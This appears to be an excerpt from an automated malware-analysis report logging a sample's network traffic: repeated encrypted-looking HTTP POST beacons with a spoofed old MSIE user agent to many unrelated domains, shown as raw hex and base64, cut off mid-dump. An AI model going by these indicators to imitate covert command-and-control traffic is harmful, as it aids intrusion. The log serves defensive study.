                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.tvtools.fiCache-Control: no-cacheData Raw: 38 57 47 32 57 51 44 2f 46 33 4c 54 2f 4f 76 64 30 2b 5a 41 66 6a 4f 43 79 77 44 6f 43 62 72 67 4e 47 61 70 65 42 6f 72 6d 75 6c 69 36 49 31 4f 64 69 77 78 32 32 6f 31 52 6b 68 6e 31 4c 54 2f 46 45 35 4e 45 64 37 48 6a 67 44 30 78 6a 57 4b 77 41 66 4c 36 41 54 38 4d 39 74 5a 4a 2f 5a 54 71 6c 37 67 36 46 6f 6f 46 55 64 75 75 52 53 6f 44 65 77 77 68 6e 62 59 6b 49 44 66 4b 6c 61 6c 62 30 35 47 4d 49 37 57 30 32 6d 53 56 48 54 39 4f 38 6a 6e 31 38 39 54 41 46 57 50 36 4d 2f 38 76 41 39 48 71 4d 5a 2b 64 4f 44 59 57 65 38 31 6f 79 72 53 68 33 61 73 4f 36 51 47 55 35 75 54 66 63 6b 6c 4e 4e 45 50 6b 6b 69 32 63 70 65 42 75 41 73 70 50 74 72 63 34 61 57 77 41 62 4f 77 79 74 42 74 4a 43 37 61 4c 5a 4e 43 49 76 67 42 68 49 6b 63 6c 78 43 43 5a 71 44 6e 70 62 43 71 32 59 6b 48 2f 5a 4b 59 76 46 70 48 5a 36 43 75 71 4e 53 78 7a 34 74 72 53 4d 4e 6c 33 49 63 48 44 64 4e 6d 67 75 39 46 62 50 72 2f 37 67 34 46 43 54 74 38 53 66 43 79 74 2f 67 2b 55 74 44 66 71 61 77 31 45 52 6b 6b 70 2b 32 4e 58 4f 5a 59 71 36 59 43 6d 6f 49 48 68 4c 63 4f 52 46 67 66 50 4e 48 37 6b 71 39 57 78 61 7a 48 65 42 5a 74 2f 66 47 63 53 5a 35 6b 69 48 64 6a 55 44 61 65 6d 71 33 63 2b 48 61 45 71 2b 4d 62 37 54 6d 56 77 65 55 7a 71 7a 42 2f 46 35 5a 30 6d 49 49 36 4d 44 52 6f 47 62 30 66 6b 67 4c 34 2b 6a 33 35 75 66 42 32 36 55 52 6f 42 55 74 62 6d 4f 4c 63 42 36 48 75 65 2b 67 2b 58 54 75 38 48 59 7a 56 46 55 61 31 4d 58 35 55 2b 6a 64 42 31 65 77 37 75 51 71 41 67 71 53 69 2f 71 2b 70 36 77 76 36 6b 59 62 41 58 36 64 6f 46 6d 58 78 67 68 6c 4b 71 76 46 52 31 47 6f 34 67 6f 33 76 49 31 65 52 42 4f 77 71 56 4f 79 6b 43 79 4e 6f 4e 57 75 39 73 55 73 3d Data Ascii: 8WG2WQD/F3LT/Ovd0+ZAfjOCywDoCbrgNGapeBormuli6I1Odiwx22o1Rkhn1LT/FE5NEd7HjgD0xjWKwAfL6AT8M9tZJ/ZTql7g6FooFUduuRSoDewwhnbYkIDfKlalb05GMI7W02mSVHT9O8jn189TAFWP6M/8vA9HqMZ+dODYWe81oyrSh3asO6QGU5uTfcklNNEPkki2cpeBuAspPtrc4aWwAbOwytBtJC7aLZNCIvgBhIkclxCCZqDnpbCq2YkH/ZKYvFpHZ6CuqNSxz4trSMNl3IcHDdNmgu9FbPr/7g4FCTt8SfCyt/g+UtDfqaw1ERkkp+2NXOZYq6YCmoIHhLcORFgfPNH7kq9WxazHeBZt/fGcSZ5kiHdjUDaemq3c+HaEq+Mb7TmVweUzqzB/F5Z0mII6MDRoGb0fkgL4+j35ufB26URoBUtbmOLcB6Hue+g+XTu8HYzVFUa1MX5U+jdB1ew7uQqAgqSi/q+p6wv6kYbAX6doFmXxghlKqvFR1Go4go3vI1eRBOwqVOykCyNoNWu9sUs=
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.depalo.comCache-Control: no-cacheData Raw: 33 6d 30 36 55 43 71 77 46 33 4a 34 47 43 6c 50 44 61 48 74 71 2b 32 4f 63 6d 74 61 53 33 49 59 2f 71 51 30 61 4f 64 39 73 41 7a 54 57 56 51 69 45 68 57 6a 32 73 42 44 7a 55 41 4e 30 77 73 57 61 54 47 54 74 43 66 56 32 74 5a 4b 57 68 31 74 49 4c 53 37 30 4d 72 41 2f 46 59 4d 78 48 73 51 75 50 53 4a 39 62 75 53 46 50 74 49 35 4d 58 4e 57 78 52 52 41 6d 39 46 52 44 4b 4b 43 4a 50 37 67 36 43 34 31 61 50 52 43 61 45 32 35 4c 49 47 4b 2b 52 4b 62 5a 76 6e 54 44 66 67 46 4d 48 6f 44 68 70 37 69 68 61 61 4f 37 59 51 67 56 36 46 5a 6a 77 4e 37 77 75 30 6a 46 4d 65 76 56 6d 68 63 51 58 49 6b 6a 7a 79 79 41 55 67 33 77 57 55 74 45 53 47 32 31 52 4c 4b 76 4e 54 6e 42 68 6f 2f 6c 4e 38 6d 42 78 41 57 4b 4d 50 4d 43 57 53 4b 71 53 50 68 54 37 49 5a 64 68 42 55 57 76 45 7a 33 33 4b 72 35 33 58 35 75 57 70 66 55 74 75 55 33 6e 4f 66 68 48 64 2f 43 4d 30 6f 63 69 69 7a 62 79 49 66 56 37 38 46 6c 73 62 74 38 72 4a 66 6a 2f 51 71 6a 6c 56 7a 31 48 52 69 34 4c 42 57 43 38 4c 49 71 71 44 76 69 71 52 63 6f 73 73 77 78 7a 74 65 68 2b 76 4b 35 53 30 31 68 72 38 45 56 47 31 79 6a 36 56 4e 47 41 50 52 63 6d 6b 4b 49 47 33 47 44 66 6a 45 65 41 65 6f 54 34 48 33 68 48 38 50 67 69 2f 6f 56 46 78 36 65 70 6d 38 6f 6e 56 34 6f 41 2b 77 43 68 4f 63 44 59 41 43 6b 2f 78 45 57 34 46 45 79 45 68 34 56 7a 38 63 76 36 4b 43 73 52 41 48 46 66 65 62 79 36 79 7a 4a 6d 49 4f 5a 4c 6d 68 67 46 4b 62 47 6c 4d 68 32 36 4a 47 37 2b 5a 6e 61 57 4e 2f 2b 51 46 36 2f 55 70 51 78 61 33 68 7a 6b 6b 48 48 4b 4a 41 50 48 70 35 6d 36 64 36 37 69 55 38 57 55 4e 59 39 6c 5a 5a 6d 32 70 74 72 30 73 73 63 68 44 6b 7a 59 52 4b 34 6b 70 76 39 39 68 71 77 3d 3d Data Ascii: 3m06UCqwF3J4GClPDaHtq+2OcmtaS3IY/qQ0aOd9sAzTWVQiEhWj2sBDzUAN0wsWaTGTtCfV2tZKWh1tILS70MrA/FYMxHsQuPSJ9buSFPtI5MXNWxRRAm9FRDKKCJP7g6C41aPRCaE25LIGK+RKbZvnTDfgFMHoDhp7ihaaO7YQgV6FZjwN7wu0jFMevVmhcQXIkjzyyAUg3wWUtESG21RLKvNTnBho/lN8mBxAWKMPMCWSKqSPhT7IZdhBUWvEz33Kr53X5uWpfUtuU3nOfhHd/CM0ociizbyIfV78Flsbt8rJfj/QqjlVz1HRi4LBWC8LIqqDviqRcosswxzteh+vK5S01hr8EVG1yj6VNGAPRcmkKIG3GDfjEeAeoT4H3hH8Pgi/oVFx6epm8onV4oA+wChOcDYACk/xEW4FEyEh4Vz8cv6KCsRAHFfeby6yzJmIOZLmhgFKbGlMh26JG7+ZnaWN/+QF6/UpQxa3hzkkHHKJAPHp5m6d67iU8WUNY9lZZm2ptr0sschDkzYRK4kpv99hqw==
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 1730User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: jnf.atConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 1400User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: e-kami.netConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.elpro.siCache-Control: no-cacheData Raw: 68 2b 65 78 63 2f 37 57 47 48 4a 75 63 75 2b 6b 79 52 49 70 37 4f 46 63 69 57 43 2b 62 42 59 6a 45 75 38 59 51 59 4e 35 4b 79 77 33 76 4c 57 31 53 45 50 48 6c 66 69 4d 2b 39 35 70 4e 32 53 77 37 65 46 69 33 51 33 34 55 32 51 32 5a 2f 6a 6a 42 37 67 5a 68 78 6e 6d 65 56 65 5a 42 33 68 71 39 32 7a 49 64 6e 34 67 44 51 69 37 57 56 5a 71 51 30 7a 71 4b 6d 44 63 37 44 43 4e 62 75 48 4a 67 37 5a 32 61 52 56 6b 2f 4f 63 72 52 77 54 76 65 35 36 5a 65 45 65 57 77 6a 70 59 4c 72 43 6e 4c 6f 30 4a 77 61 67 62 49 6f 61 78 71 49 4b 49 4e 61 2b 30 55 66 31 52 65 78 74 73 55 45 75 51 41 70 45 44 62 4d 41 67 59 58 65 6a 6c 5a 6c 6b 54 43 44 42 64 38 48 6b 4e 44 51 67 67 49 68 68 43 38 37 68 4f 39 69 6c 57 6d 56 6e 78 42 54 30 2b 49 66 65 7a 38 6d 2f 33 61 4e 2b 63 63 6b 68 67 71 42 72 52 32 34 52 33 49 50 4d 53 49 36 63 6b 58 43 69 76 58 46 73 44 4c 77 78 4c 32 34 63 6f 50 43 63 71 67 37 53 56 43 2f 58 38 66 37 37 30 59 37 61 31 74 6a 47 57 61 2f 6b 70 64 4e 75 77 70 55 66 70 56 65 53 31 47 43 41 55 6d 4f 6f 69 61 65 77 36 66 6d 45 48 56 68 50 4b 4b 77 77 6d 4f 42 58 62 2b 73 69 2f 6e 7a 48 55 69 39 6a 70 4e 4d 4a 43 33 34 74 4e 6a 78 44 64 4f 71 67 75 62 34 72 73 6d 44 52 73 36 52 32 61 30 31 61 78 51 4b 67 53 66 46 65 4e 79 49 5a 74 55 35 4d 76 57 34 4f 65 4a 78 4c 73 7a 72 35 4f 62 34 38 6e 62 31 33 2f 6d 2b 37 56 4c 62 74 5a 50 2b 6b 4d 7a 56 46 72 73 4a 2f 34 2b 64 36 73 37 76 61 54 43 39 2f 66 62 47 50 57 64 39 74 33 2f 77 2f 72 4f 6a 67 47 50 4d 76 44 69 51 4c 38 4a 73 55 52 50 55 65 31 68 68 65 49 2f 57 66 76 39 35 65 31 4f 48 30 49 36 41 46 65 53 51 74 6e 6a 39 54 42 4f 4d 70 59 30 5a 62 75 6f 70 55 5a 77 4e 62 30 2f 32 75 72 6c 6a 51 72 52 67 5a 55 67 3d 3d Data Ascii: h+exc/7WGHJucu+kyRIp7OFciWC+bBYjEu8YQYN5Kyw3vLW1SEPHlfiM+95pN2Sw7eFi3Q34U2Q2Z/jjB7gZhxnmeVeZB3hq92zIdn4gDQi7WVZqQ0zqKmDc7DCNbuHJg7Z2aRVk/OcrRwTve56ZeEeWwjpYLrCnLo0JwagbIoaxqIKINa+0Uf1RextsUEuQApEDbMAgYXejlZlkTCDBd8HkNDQggIhhC87hO9ilWmVnxBT0+Ifez8m/3aN+cckhgqBrR24R3IPMSI6ckXCivXFsDLwxL24coPCcqg7SVC/X8f770Y7a1tjGWa/kpdNuwpUfpVeS1GCAUmOoiaew6fmEHVhPKKwwmOBXb+si/nzHUi9jpNMJC34tNjxDdOqgub4rsmDRs6R2a01axQKgSfFeNyIZtU5MvW4OeJxLszr5Ob48nb13/m+7VLbtZP+kMzVFrsJ/4+d6s7vaTC9/fbGPWd9t3/w/rOjgGPMvDiQL8JsURPUe1hheI/Wfv95e1OH0I6AFeSQtnj9TBOMpY0ZbuopUZwNb0/2urljQrRgZUg==
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.petsfan.comCache-Control: no-cacheData Raw: 33 53 46 61 4b 6b 4f 32 4e 33 4b 59 63 46 67 71 53 75 5a 73 43 47 79 4e 50 35 66 70 77 58 4d 2f 4a 36 43 70 49 69 45 42 6f 78 64 70 6d 2f 30 35 6c 54 51 48 51 43 41 66 68 48 6a 4a 73 73 63 69 58 64 46 37 2f 36 4e 34 37 54 74 6f 61 2f 2f 6f 77 68 66 38 5a 77 31 58 50 62 46 47 39 55 75 53 41 71 51 61 4c 58 41 4f 69 49 74 4c 43 6c 52 62 61 65 33 79 38 51 33 33 41 79 59 72 30 34 71 46 6b 6e 32 34 4b 4f 4a 65 72 74 61 44 6b 65 68 36 63 55 64 65 71 48 30 53 37 2b 6f 35 4b 4f 6e 32 33 50 4a 51 50 77 61 59 65 33 31 66 72 54 69 6b 6d 71 49 61 62 6f 66 50 36 68 41 73 43 59 43 51 76 49 43 71 41 2b 43 4c 34 51 42 7a 4a 45 61 6b 71 43 49 61 6f 6d 34 62 50 62 73 56 74 6a 34 6a 52 4f 33 35 78 70 5a 6a 51 37 52 43 6c 4f 48 34 6f 45 76 44 6f 31 65 52 31 50 49 39 63 50 45 75 35 72 6b 2f 61 37 41 78 64 51 6d 49 33 67 46 6f 42 6b 6d 58 77 69 43 41 30 33 52 6b 38 49 74 59 54 46 74 72 5a 6d 2b 48 39 4c 61 4c 2b 56 6f 4f 50 48 76 79 69 4a 79 54 4a 4a 52 69 6c 54 5a 70 67 50 57 62 4f 51 71 56 37 65 57 30 68 62 41 38 72 4b 73 53 43 4b 59 58 51 78 59 67 39 52 49 42 74 70 31 64 6b 5a 73 7a 54 4f 7a 4e 33 77 6f 49 68 30 48 67 61 4d 34 4e 55 41 55 69 39 37 4c 48 31 6b 48 6d 36 70 44 52 31 4c 62 6d 70 52 6e 52 44 32 49 51 57 35 4b 6f 4a 79 4b 75 49 4f 50 5a 44 34 6a 73 75 32 73 68 7a 62 38 67 6b 68 63 69 50 50 78 7a 6a 47 4b 79 51 4d 48 2b 65 2f 44 64 64 6d 4e 48 72 75 4e 51 53 79 36 7a 48 52 75 61 75 77 6d 57 54 4a 59 65 68 4d 41 56 64 68 57 5a 48 31 63 79 56 48 54 35 4c 2f 76 45 6c 52 31 6b 66 44 41 72 65 69 6a 39 47 37 73 6e 79 56 30 4f 58 74 54 33 62 73 41 55 44 43 31 6b 59 71 56 53 67 43 48 43 34 33 39 52 7a 36 5a 76 44 4d 38 70 49 5a 65 66 61 70 33 72 61 53 6c 52 38 2f 52 5a 44 77 3d 3d Data Ascii: 3SFaKkO2N3KYcFgqSuZsCGyNP5fpwXM/J6CpIiEBoxdpm/05lTQHQCAfhHjJssciXdF7/6N47Ttoa//owhf8Zw1XPbFG9UuSAqQaLXAOiItLClRbae3y8Q33AyYr04qFkn24KOJertaDkeh6cUdeqH0S7+o5KOn23PJQPwaYe31frTikmqIabofP6hAsCYCQvICqA+CL4QBzJEakqCIaom4bPbsVtj4jRO35xpZjQ7RClOH4oEvDo1eR1PI9cPEu5rk/a7AxdQmI3gFoBkmXwiCA03Rk8ItYTFtrZm+H9LaL+VoOPHvyiJyTJJRilTZpgPWbOQqV7eW0hbA8rKsSCKYXQxYg9RIBtp1dkZszTOzN3woIh0HgaM4NUAUi97LH1kHm6pDR1LbmpRnRD2IQW5KoJyKuIOPZD4jsu2shzb8gkhciPPxzjGKyQMH+e/DddmNHruNQSy6zHRuauwmWTJYehMAVdhWZH1cyVHT5L/vElR1kfDAreij9G7snyV0OXtT3bsAUDC1kYqVSgCHC439Rz6ZvDM8pIZefap3raSlR8/RZDw==
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.credo.edu.plCache-Control: no-cacheData Raw: 71 72 36 67 56 51 76 64 46 33 4c 2b 49 69 55 6c 59 6f 37 4b 48 33 51 4c 36 59 4e 52 5a 48 61 31 62 39 63 6c 73 43 37 4a 42 66 52 61 74 72 61 65 52 72 36 55 4d 54 2b 67 56 6d 65 41 59 35 62 42 6f 77 50 7a 58 79 42 69 49 6b 65 30 4d 48 5a 6a 5a 55 73 57 6c 4b 4d 73 4f 42 56 58 33 64 31 4a 6d 6e 41 42 70 67 49 30 61 64 57 32 32 65 43 62 67 4d 67 50 75 50 58 69 67 78 6d 46 46 44 57 56 79 46 41 2b 76 4a 74 4e 33 53 4a 73 73 2b 35 4d 41 45 36 74 2f 64 36 51 37 72 2f 4c 47 50 5a 42 76 68 66 6a 65 6c 6a 44 36 78 76 50 55 47 62 48 72 49 6a 7a 4c 4f 67 39 34 64 4d 66 67 30 65 68 39 67 51 58 48 42 76 58 33 77 2f 74 30 4c 52 43 38 57 57 70 44 57 72 4e 51 53 78 53 78 65 4f 49 67 52 62 55 71 6a 62 65 31 6f 45 42 45 54 4d 2b 6d 68 42 34 4b 69 58 4c 79 53 67 2b 41 7a 67 77 63 34 36 4c 72 64 33 47 5a 6c 37 4e 49 74 31 2f 63 4f 54 48 30 6a 46 50 43 70 6d 49 52 70 62 56 78 74 2f 6e 65 55 66 78 43 4c 65 6d 35 4e 73 6f 70 33 31 53 7a 4a 65 68 41 45 48 6b 34 4f 53 44 76 6e 62 4d 6d 66 32 41 78 30 58 7a 59 57 42 58 75 32 49 67 79 53 6f 74 54 41 67 35 54 2f 70 56 4f 43 59 79 75 45 6a 75 4d 56 4f 4f 45 37 31 63 57 41 41 41 58 62 6d 55 55 6a 35 56 64 74 38 46 73 4d 50 7a 76 53 73 6e 52 46 6e 4f 78 56 34 5a 33 63 4f 57 67 6e 78 31 34 57 49 4c 73 49 2f 77 77 32 45 37 45 49 66 7a 66 63 73 33 6d 68 41 7a 65 44 4a 4a 41 67 2b 59 65 48 47 55 53 6c 6a 64 54 35 53 71 6d 30 48 5a 56 6f 50 77 6d 31 34 59 66 38 63 72 58 31 41 2f 37 45 46 37 48 63 55 41 39 7a 34 35 64 4a 38 36 4c 67 42 6b 46 6b 31 6b 6f 55 43 2f 76 63 47 43 50 31 55 53 65 73 4e 57 77 6c 52 35 33 37 4b 53 35 6e 2f 38 2b 57 68 32 68 6f 34 45 45 45 69 4c 2f 4e 37 72 79 45 2b 43 55 73 6a 2b 73 6c 2b 79 4d 59 35 50 67 49 49 63 Data Ascii: qr6gVQvdF3L+IiUlYo7KH3QL6YNRZHa1b9clsC7JBfRatraeRr6UMT+gVmeAY5bBowPzXyBiIke0MHZjZUsWlKMsOBVX3d1JmnABpgI0adW22eCbgMgPuPXigxmFFDWVyFA+vJtN3SJss+5MAE6t/d6Q7r/LGPZBvhfjeljD6xvPUGbHrIjzLOg94dMfg0eh9gQXHBvX3w/t0LRC8WWpDWrNQSxSxeOIgRbUqjbe1oEBETM+mhB4KiXLySg+Azgwc46Lrd3GZl7NIt1/cOTH0jFPCpmIRpbVxt/neUfxCLem5Nsop31SzJehAEHk4OSDvnbMmf2Ax0XzYWBXu2IgySotTAg5T/pVOCYyuEjuMVOOE71cWAAAXbmUUj5Vdt8FsMPzvSsnRFnOxV4Z3cOWgnx14WILsI/ww2E7EIfzfcs3mhAzeDJJAg+YeHGUSljdT5Sqm0HZVoPwm14Yf8crX1A/7EF7HcUA9z45dJ86LgBkFk1koUC/vcGCP1USesNWwlR537KS5n/8+Wh2ho4EEEiL/N7ryE+CUsj+sl+yMY5PgIIc
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 1007User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: btsi.com.phConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 996User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: ruzee.comConnection: Keep-AliveCache-Control: no-cacheData Raw: 37 4a 54 63 6d 77 36 47 50 59 69 73 32 42 4c 55 65 6f 79 37 48 51 61 6a 74 33 43 4d 57 66 70 7a 38 49 52 62 6b 76 34 45 4e 58 67 72 30 41 4a 53 63 6c 77 35 46 4f 59 68 73 31 41 4b 54 64 6d 78 36 47 51 5a 6a 74 33 43 4d 56 66 70 7a 38 49 52 62 6b 75 34 44 4e 57 67 71 30 39 4a 53 62 6c 76 35 45 4f 58 68 72 31 41 4b 54 64 6d 77 36 47 50 59 69 73 32 42 4c 55 65 6f 78 37 47 51 5a 6a 74 32 43 4d 56 66 70 7a 38 49 52 62 6b 76 34 45 4e 58 67 72 30 41 4a 53 63 6d 77 35 46 4f 59 68 73 31 42 4b 55 64 6f 78 36 47 51 5a 69 74 32 43 4d 56 65 70 79 38 48 52 61 6b 75 34 44 4e 57 66 71 7a 39 4a 53 63 6c 77 35 46 4f 59 68 72 31 41 4b 54 64 6d 78 36 47 50 5a 69 74 32 42 4c 56 65 6f 79 37 48 51 61 6a 75 33 44 4d 57 66 71 7a 39 49 52 62 6b 76 35 45 4e 58 67 72 30 39 4a 54 63 6d 77 36 46 50 59 69 73 31 42 4b 55 64 6f 78 37 47 51 61 6a 74 33 43 4d 56 66 70 7a 38 49 52 61 6b 75 34 44 4e 57 66 71 7a 39 49 53 62 6b 76 35 45 4e 58 67 72 30 41 4a 54 63 6d 77 36 46 4f 59 68 73 32 42 4c 55 64 6f 78 37 47 51 5a 6a 74 33 43 4d 56 66 70 7a 38 49 52 62 6c 76 34 45 4e 58 67 72 30 41 4a 54 63 6d 77 36 46 50 59 69 73 32 42 4b 55 64 6f 78 37 47 51 5a 6a 74 33 43 4d 56 65 70 7a 38 49 52 62 6b 75 34 44 4e 57 67 71 30 39 4a 53 63 6c 77 35 46 4f 59 68 73 31 42 4b 54 64 6d 78 36 47 50 59 69 73 32 42 4c 55 65 6f 79 37 48 51 61 6a 74 33 44 4d 56 66 71 7a 39 49 53 62 6b 78 36 47 50 5a 69 74 32 42 4c 55 65 6f 79 37 48 51 5a 6a 74 33 43 4d 56 66 70 7a 38 49 52 62 6b 76 34 44 4e 57 67 71 30 39 49 53 62 6c 76 35 45 4e 58 68 72 30 41 4a 54 63 6d 77 36 46 50 59 69 73 32 42 4b 55 64 6f 78 37 47 51 5a 69 74 32 43 4c 56 65 70 79 38 48 52 61 6a 75 33 44 4e 57 66 71 7a 39 49 53 62 6c 76 35 45 4e 58 67 72 30 41 4a 54 63 6d 77 36 46 50 59 68 73 31 42 4c 55 65 6f 79 37 48 51 5a 6a 74 33 43 4d 56 66 70 7a 38 48 52 61 6b 75 34 44 4e 57 67 71 30 39 4a 53 63 6c 77 36 46 4f 59 68 73 31 42 4b 55 64 6f 78 37 47 50 5a 69 74 32 43 4c 56 65 70 79 38 48 52 61 6a 75 34 45 4e 57 67 71 30 39 4a 53 63 6c 76 35 45 4f 58 68 72 30 41 4a 54 63 6d 77 36 46 50 59 69 73 32 42 4b 55 64 6f 78 37 47 51 5a 6a 74 33 43 4c 56 65 70 79 38 48 52 61 6a 75 33 44 4e 57 66 71 7a 39 49 53 63 6c 76 35 45 4f 58 68 72 31 41 4b 54 64 6d 77 36 46 50 59 69 73 32 43 4c 56 65 70 79 38 48 52 61 6b 75 34 44 4e 57 67 71 30 39 4a 53 63 6c 76 35 45 4f 58 68 72 31 41 4b 54 63 6d 77 36 46 50 59 69 73 32 42 4c 55 65 6f 79 37 48 51 61 6a 75 33 43 4d 56 66 70 7a 38 48 52 61 6b 75 34 44 4e 58 67 72 30 41 4a 54 63 6d 77 36 46 50 59 69 73 32 42 4b 55 64 6f 78 37 47 51 5a 6a 74 33 43 4c 56 65 70 79 38 48 52 61 6b 75 34 44 4e 57 66 71 7a 39 49 53 62 6c 76 35 45 4e 58 67 72 30 41 4a 54 63 6d 77 36 46 50 59 69 73 32 42 4b 55 64 6f 78 37 47 51 5a 6a 74 33 43 4c 56 65 70 79 38 48 52 61 6b 75 34 44 4e 57 66 71 7
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mqs.com.brCache-Control: no-cacheCookie: _mcnc=1; __goc_session__=amuvqzixxlrkwopttphdmfdzewvulswhData Raw: 69 54 71 66 50 6d 72 37 77 33 45 49 61 62 45 50 54 66 50 6f 70 69 30 34 4f 31 57 61 42 2b 72 58 50 73 54 78 67 61 31 74 72 39 4a 63 42 5a 36 50 4a 41 68 6d 6f 7a 4d 69 77 6c 61 64 77 4f 65 6c 43 58 63 61 36 42 41 6b 52 54 70 77 41 2f 32 47 64 71 50 34 66 4b 43 30 70 52 76 56 33 57 64 46 58 71 35 2f 50 34 65 77 52 71 38 38 49 61 32 4f 72 6b 2b 6c 34 77 65 6a 78 6d 37 75 36 39 54 31 4f 36 56 4f 47 43 37 4f 72 4d 42 63 50 58 4b 38 38 4e 50 41 77 74 7a 45 42 69 69 5a 5a 75 6f 5a 54 6d 56 31 30 45 34 39 37 73 71 6b 50 39 76 54 4b 6a 79 59 67 59 61 6b 62 39 59 44 2f 67 2b 2b 62 42 50 49 4c 46 4d 63 59 71 6e 70 71 37 48 73 38 4c 72 77 73 74 41 2b 6a 72 77 75 46 6c 76 72 4d 61 5a 69 31 36 72 77 44 70 79 53 51 69 53 49 6e 4b 4a 7a 32 4b 4b 31 6e 4e 64 36 4f 68 69 64 56 6f 45 4a 6b 69 41 68 77 57 4f 44 71 4d 30 33 58 49 41 4f 37 55 79 5a 69 54 4a 47 5a 68 36 46 53 7a 43 77 64 74 44 5a 42 66 36 52 79 4e 67 4e 48 57 30 54 4f 38 44 68 30 46 31 42 4d 7a 6f 34 69 74 51 32 42 53 41 41 69 39 74 5a 37 50 70 67 70 64 2b 6c 4c 36 69 77 75 48 48 5a 35 4b 31 6a 2b 31 51 7a 58 31 37 39 34 48 49 76 6d 6d 61 30 59 43 6a 4f 53 43 36 33 34 78 2f 5a 54 66 71 6b 2b 46 32 32 57 41 65 41 68 32 38 66 64 46 30 69 54 43 6c 30 6a 6f 4a 63 48 53 4d 45 6e 46 43 4b 39 4e 2f 37 30 50 67 50 4e 2f 7a 2f 4d 56 45 53 57 44 42 6f 54 59 6c 77 35 5a 56 63 7a 31 6d 70 41 54 54 51 4b 4d 72 65 78 6b 62 56 6b 49 79 78 4c 71 66 45 4d 78 49 73 75 33 64 68 38 38 36 37 57 63 70 43 38 68 62 4a 4f 6d 72 6a 6e 33 38 6d 2f 47 57 47 71 6e 36 4c 71 78 44 62 42 50 6c 68 37 34 54 65 36 66 78 74 48 6e 2f 54 59 49 6c 35 68 61 4a 35 6d 6e 2b 65 65 6f 4d 30 66 52 64 57 45 45 4f 56 49 78 74 43 2b 2f 43 72 38 41 47 35 71 7a 62 51 78 78 66 6c 52 64 38 70 6e 54 79 5a 6a 55 76 4d 42 4f 64 61 6b 39 39 66 43 6c 38 3d Data Ascii: iTqfPmr7w3EIabEPTfPopi04O1WaB+rXPsTxga1tr9JcBZ6PJAhmozMiwladwOelCXca6BAkRTpwA/2GdqP4fKC0pRvV3WdFXq5/P4ewRq88Ia2Ork+l4wejxm7u69T1O6VOGC7OrMBcPXK88NPAwtzEBiiZZuoZTmV10E497sqkP9vTKjyYgYakb9YD/g++bBPILFMcYqnpq7Hs8LrwstA+jrwuFlvrMaZi16rwDpySQiSInKJz2KK1nNd6OhidVoEJkiAhwWODqM03XIAO7UyZiTJGZh6FSzCwdtDZBf6RyNgNHW0TO8Dh0F1BMzo4itQ2BSAAi9tZ7Ppgpd+lL6iwuHHZ5K1j+1QzX1794HIvmma0YCjOSC634x/ZTfqk+F22WAeAh28fdF0iTCl0joJcHSMEnFCK9N/70PgPN/z/MVESWDBoTYlw5ZVcz1mpATTQKMrexkbVkIyxLqfEMxIsu3dh8867WcpC8hbJOmrjn38m/GWGqn6LqxDbBPlh74Te6fxtHn/TYIl5haJ5mn+eeoM0fRdWEEOVIxtC+/Cr8AG5qzbQxxflRd8pnTyZjUvMBOdak99fCl8=
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.item-pr.comCache-Control: no-cacheData Raw: 4a 45 74 39 5a 6a 74 70 47 48 4b 73 75 46 39 38 30 73 31 63 43 43 54 58 4a 72 46 42 37 50 47 45 6e 34 36 6b 49 58 58 64 73 42 4a 6d 32 34 69 4b 41 55 77 7a 72 6c 78 68 53 4d 30 4b 47 68 45 39 33 34 38 50 6e 72 31 41 72 72 4a 72 43 67 66 4f 6d 34 62 53 6d 71 35 45 43 72 72 4f 2b 6b 6f 71 4d 37 59 30 4c 4f 59 6a 2b 74 56 43 43 46 48 34 6b 79 2f 50 6c 43 50 33 63 6c 49 6f 34 4c 33 6c 35 47 69 7a 46 4b 48 59 6a 4d 67 53 47 63 49 54 37 34 74 6b 4c 4f 61 6c 49 74 35 71 73 2f 6f 79 54 7a 55 45 6c 79 31 71 58 71 66 2b 59 75 66 30 6c 34 46 4b 6a 6f 4a 67 39 68 68 52 4f 33 38 30 7a 4b 4a 76 69 66 63 79 69 34 67 41 57 45 42 72 4d 77 48 71 36 5a 7a 34 43 7a 33 4c 4e 7a 63 43 44 4d 4d 32 54 41 5a 42 59 73 37 51 64 79 4d 35 39 74 5a 38 53 37 42 36 37 34 70 59 4f 61 